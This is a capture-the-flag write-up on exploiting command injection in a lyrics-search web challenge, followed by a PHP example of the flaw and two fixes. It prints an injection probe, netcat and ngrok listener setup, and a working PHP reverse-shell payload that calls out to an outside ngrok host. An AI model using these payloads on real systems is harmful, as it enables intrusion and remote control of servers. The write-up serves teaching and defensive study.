Quals-isi/web/Lyricsa

Zagrouba Alaa
2 min read, Feb 5, 2024


First Look

Description: I’ve created a site to display song lyrics. Currently, it only has a few songs that I like. I’ve added a search feature, and because I’ve often read about how databases can suck, I opted for a different solution, one that is really fast and cool ;)

We are given the URL of the web challenge.

The Goal

The description says “databases can suck”, so the first thought is SQL injection, or else figuring out what the alternative solution might be.

I tried a lot of SQL and NoSQL injections and none of them seemed to work; the application did not react at all. That makes a Linux server running a shell command behind the search a very plausible option, so I tried ;ls and got nothing back. To test for RCE on a remote server when nothing is echoed, we can use something “blind” like sleep 5 to pause the request for 5 seconds. It is a good thing to try first because if it works, it works in any situation.

payload: ;sleep 5

It worked, so now we know we have command execution on the remote server, and of course the first thing you think of is a reverse shell :)

So, the first step is to make our Linux machine reachable from the internet by forwarding a port with ngrok:

1. Open a port:

ngrok tcp 9000

2. Start a listener on that port (TCP socket); this is where the reverse shell will land:

nc -lvnp 9000

Exploiting it

Now we should head to https://www.revshells.com/ to get a reverse shell payload. Trying every payload there is time-consuming, but we can anticipate a PHP socket, either from Wappalyzer or because Osama loves PHP :)

Final payload:

;php -r '$sock=fsockopen("2.tcp.eu.ngrok.io",15111);exec("sh <&3 >&3 2>&3");'

Then we get a shell on the listener and cat the flag: cat ../../../flag.txt
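What the bug most likely looks like on the server side, beside two fixes, as an added example that is not the challenge's code; the function names and the lyrics/ directory are assumptions:

```php
<?php
// Added example (not the challenge's code): a lyric search that mirrors the
// bug exploited above, beside a hardened version. Function names and the
// lyrics/ directory are assumptions.

// Vulnerable: the query is spliced into a shell command, so ";sleep 5"
// (or any other ";command") runs as a second command.
function search_lyrics_vulnerable(string $query): string
{
    return (string) shell_exec("grep -ril " . $query . " lyrics/");
}

// Fix 1: if a shell is unavoidable, quote the argument so the whole query
// is one literal word and ';' has no meaning to the shell.
function search_lyrics_quoted(string $query): string
{
    $cmd = "grep -ril -- " . escapeshellarg($query) . " lyrics/";
    return (string) shell_exec($cmd);
}

// Fix 2 (preferred): no shell at all. Read the files in PHP and match
// with stripos, so the query is only ever data.
function search_lyrics_native(string $query, string $dir = "lyrics"): array
{
    $hits = [];
    foreach (glob($dir . "/*.txt") as $path) {
        if (stripos((string) file_get_contents($path), $query) !== false) {
            $hits[] = basename($path);
        }
    }
    return $hits;
}

// Demo on a constructed lyrics/ directory with two sample songs.
@mkdir("lyrics");
file_put_contents("lyrics/song1.txt", "hello darkness my old friend");
file_put_contents("lyrics/song2.txt", "we will rock you");

$start = microtime(true);
search_lyrics_quoted(";sleep 5");        // searches for the literal text
$elapsed = microtime(true) - $start;
echo "quoted search took " . round($elapsed, 2) . "s (no sleep ran)\n";

print_r(search_lyrics_native("rock"));   // song2.txt only
```

The same ;sleep 5 probe used in the write-up is the regression test: against the quoted and native versions the request returns immediately.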
